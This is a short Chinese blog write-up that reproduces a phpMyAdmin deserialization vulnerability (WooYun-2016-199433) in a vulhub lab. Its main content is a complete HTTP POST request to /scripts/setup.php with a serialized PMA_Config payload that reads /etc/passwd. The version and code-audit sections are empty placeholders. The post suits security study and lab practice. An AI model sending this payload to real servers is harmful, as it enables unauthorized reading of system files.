phpmyadmin反序列化漏洞(WooYun-2016-199433)
2024-10-10 01:58:12
简介
环境复现:https://github.com/vulhub/vulhub
线上平台:榆林学院内可使用协会内部的网络安全实验平台
phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具
影响版本
1 1
代码审计
1
利用过程
http://192.168.52.129:8080/scripts/setup.php
发送如下数据包,即可读取/etc/passwd
POST /scripts/setup.php HTTP/1.1
Host: your-ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 80 action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
最新文章
- jQuery LigerUI V1.2.2 (包括API和全部源码) 发布
- .NET MVC AjaxHelper
- 如何让IE8的菜单栏调到最上方
- 读《java核心技术卷一》有感
- jquery.validate+jquery.form提交的三种方式
- Spark目录
- FZU 2129 子序列个数
- setInterval和setTimeout定时器
- C++线程类的封装
- 列表:一个打了激素的数组3 - 零基础入门学习Python012
- C语言的一些常见细节
- How do I get the lowest value of all the non zero value pixels?
- Python数据类型及其方法详解
- Section 1.1 Your Ride Is Here
- 《java入门第一季》之集合框架(Collection小儿子Set集合)
- 使用mongodb的一些笔记
- webpack4 搭建遇到的奇葩问题集合
- 服务发现 - consul 的介绍、部署和使用(转)
- Qt Creator + MinGW 在windows 下的调试GDB停止工作解决
- 浅谈使用NIO,AIO的感受